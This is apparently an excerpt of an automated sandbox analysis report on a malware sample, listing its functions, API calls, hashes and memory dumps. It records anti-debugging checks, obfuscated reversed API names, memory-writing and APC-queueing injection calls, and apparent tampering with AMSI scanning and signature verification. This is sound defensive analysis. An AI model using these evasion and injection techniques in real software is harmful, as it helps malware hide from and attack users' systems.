                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B8B
                                                                      • RegQueryValueExA.ADVAPI32(?,02C95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001), ref: 02C95BA9
                                                                      • RegCloseKey.ADVAPI32(?,02C95BD8,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95BCB
                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95BE8
                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BF5
                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BFB
                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95C26
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C6D
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C7D
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95CA5
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95CB5
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95CDB
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95CEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                      • API String ID: 1759228003-2375825460
                                                                      • Opcode ID: 87f69778e298b181970940db66400d3736d06bfa8747a233ae9edc58184a6699
                                                                      • Instruction ID: 91f55bd8d8ab8c8b2592c949050c2f7dbc566600a75838d58ab6d942ff588418
                                                                      • Opcode Fuzzy Hash: 87f69778e298b181970940db66400d3736d06bfa8747a233ae9edc58184a6699
                                                                      • Instruction Fuzzy Hash: D951DA71A4065D7EFF26DAA4CC4AFEF77AD9B04784F8401A1AA04E6181D7B49B44CF60
                                                                      Function 02CA894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 11492 2ca894c-2ca8971 LoadLibraryW 11493 2ca89bb-2ca89c1 11492->11493 11494 2ca8973-2ca898b GetProcAddress 11492->11494 11495 2ca898d-2ca89ac call 2ca7d78 11494->11495 11496 2ca89b0-2ca89b6 FreeLibrary 11494->11496 11495->11496 11499 2ca89ae 11495->11499 11496->11493 11499->11496
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                      • API String ID: 1002360270-4067648912
                                                                      • Opcode ID: e9322e0bbcbef5dfd7bc38dac61f4316c425a42784f7998b045ccd875379b160
                                                                      • Instruction ID: 2da5fe92100320bdd11767bb1f88f4eaf4016209fb927d48bc14e225dbae8fa0
                                                                      • Opcode Fuzzy Hash: e9322e0bbcbef5dfd7bc38dac61f4316c425a42784f7998b045ccd875379b160
                                                                      • Instruction Fuzzy Hash: 48F08C71EC0204BFF710A668E84DB56F79CA780B18F000929A9A8867A0C7701C56CB50
                                                                      Function 02CAF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 11509 2caf744-2caf75e GetModuleHandleW 11510 2caf78a-2caf792 11509->11510 11511 2caf760-2caf772 GetProcAddress 11509->11511 11511->11510 11512 2caf774-2caf784 CheckRemoteDebuggerPresent 11511->11512 11512->11510 11513 2caf786 11512->11513 11513->11510
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAF754
                                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAF766
                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAF77D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                      • API String ID: 35162468-539270669
                                                                      • Opcode ID: cac8b807cf4fedcb280a3bf5da8ff7c77b8578e45389ed5345f3da622c9daade
                                                                      • Instruction ID: 2a4f41f6ac6453db1f42735f17b45c81a0998bf19fc01c4be6593dd94997a1a1
                                                                      • Opcode Fuzzy Hash: cac8b807cf4fedcb280a3bf5da8ff7c77b8578e45389ed5345f3da622c9daade
                                                                      • Instruction Fuzzy Hash: EFF0A07090424DBAEB10A6F8889C7DCFBBD9B0932CF2443E8A435E25C1E7720780CA91
                                                                      Function 02CADD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDAB
                                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDDB
                                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADDF0
                                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADE1C
                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADE25
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                      • String ID:
                                                                      • API String ID: 1897104825-0
                                                                      • Opcode ID: bf7c93adfe9ab0597670a3c5b34c26280808538d1ed3c429b540ab4d658a2a7c
                                                                      • Instruction ID: 957879606f4b62f0df473b4f40fa84ba66f7a1e653ac0e743e0a64cd0f2bac11
                                                                      • Opcode Fuzzy Hash: bf7c93adfe9ab0597670a3c5b34c26280808538d1ed3c429b540ab4d658a2a7c
                                                                      • Instruction Fuzzy Hash: A7213071A40309BFEB11EAE4DC56FDEB7BDEB08704F500561B201F71C0DAB4AA059BA4
                                                                      Function 02CAE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckConnectionInternet
                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                      • API String ID: 3847983778-3852638603
                                                                      • Opcode ID: 48617458a978c36b5360830ad6d73c28dfc471c4d4e19e55257403aec3d998e6
                                                                      • Instruction ID: b17e778201ad1a93db1269508ac57799c6cc0ae4733adfaf1700c098de84b88b
                                                                      • Opcode Fuzzy Hash: 48617458a978c36b5360830ad6d73c28dfc471c4d4e19e55257403aec3d998e6
                                                                      • Instruction Fuzzy Hash: 65411E75B1010D9FEF24EBA8D855EDEB3BAEF88708F204835E041A7251DA70AD02DF95
                                                                      Function 02CADC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                      • String ID:
                                                                      • API String ID: 3764614163-0
                                                                      • Opcode ID: 7fc9b1fd354cee684bb86b000eca54b12bd1d6fcfe0c02bc56e34a0c176094b3
                                                                      • Instruction ID: f920a9bbf5bd205f8cc6f1d3938b997fa7d67c907d1dc63eed5fa6e2f4e309ed
                                                                      • Opcode Fuzzy Hash: 7fc9b1fd354cee684bb86b000eca54b12bd1d6fcfe0c02bc56e34a0c176094b3
                                                                      • Instruction Fuzzy Hash: E1211D71E41209BEEB20EAA0DD56FDEB3BDEB04B04F614561B601F75C0D7B06A059B64
                                                                      Function 02CA8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                      • API String ID: 3130163322-2353454454
                                                                      • Opcode ID: e2cec41f1015a33c312c46624d01e965d62d52b354311fb78cc16f8bec24dca1
                                                                      • Instruction ID: 22d2a66364afe2f290104958d6ccc2727ad09d97e245a00d20c84805b11c324f
                                                                      • Opcode Fuzzy Hash: e2cec41f1015a33c312c46624d01e965d62d52b354311fb78cc16f8bec24dca1
                                                                      • Instruction Fuzzy Hash: 5911F3B2680249BFEB50EFA8DC91F9A77EDEB0C704F514520FA08E3610C634ED119B24
                                                                      Function 02CA7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                      • API String ID: 4072585319-445027087
                                                                      • Opcode ID: 2328fbee2e331b6bc37e34a8b04be060ec1b8bf6bf2df5f03d1e26873583cef7
                                                                      • Instruction ID: 667fcc84d4757ff7d8d9d4ef4ec3aa42f288d13a6b591d5069d684e008b1afd6
                                                                      • Opcode Fuzzy Hash: 2328fbee2e331b6bc37e34a8b04be060ec1b8bf6bf2df5f03d1e26873583cef7
                                                                      • Instruction Fuzzy Hash: A8116975680209BFEB14EFA4EC65EAEB7EEFB48B04F404460B906D7610D630AE05DB20
                                                                      Function 02CA7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                      • API String ID: 4072585319-445027087
                                                                      • Opcode ID: c4ebd7b8ba6fed13f2c889be9150a56e1e2dd85e525ee9475fde917b2445a288
                                                                      • Instruction ID: 2a1ac81703bec829f8ae8f835920239c28d7347c851c79338581cdb09c87e253
                                                                      • Opcode Fuzzy Hash: c4ebd7b8ba6fed13f2c889be9150a56e1e2dd85e525ee9475fde917b2445a288
                                                                      • Instruction Fuzzy Hash: 81118C75680209BFEB14EFA4EC65FAEB7EEFB48B04F404460B906D7610D630AE05DB20
                                                                      Function 02CA7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                      • API String ID: 2719805696-3542721025
                                                                      • Opcode ID: 463d122bf5810602904b9b66b5c2d8a185411b5c9e9ee4294ac33b7a63e0aeb9
                                                                      • Instruction ID: db6577c223bc331952f3390788cf175d0a53038d769343eb1d6b511c5d2e1aba
                                                                      • Opcode Fuzzy Hash: 463d122bf5810602904b9b66b5c2d8a185411b5c9e9ee4294ac33b7a63e0aeb9
                                                                      • Instruction Fuzzy Hash: 6A016975640249BFEB14EFA8EC65E9EB7EDFB49704F504860B804D7A10C730AD159B60
                                                                      Function 02CA8730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21nativethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02CA8761
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
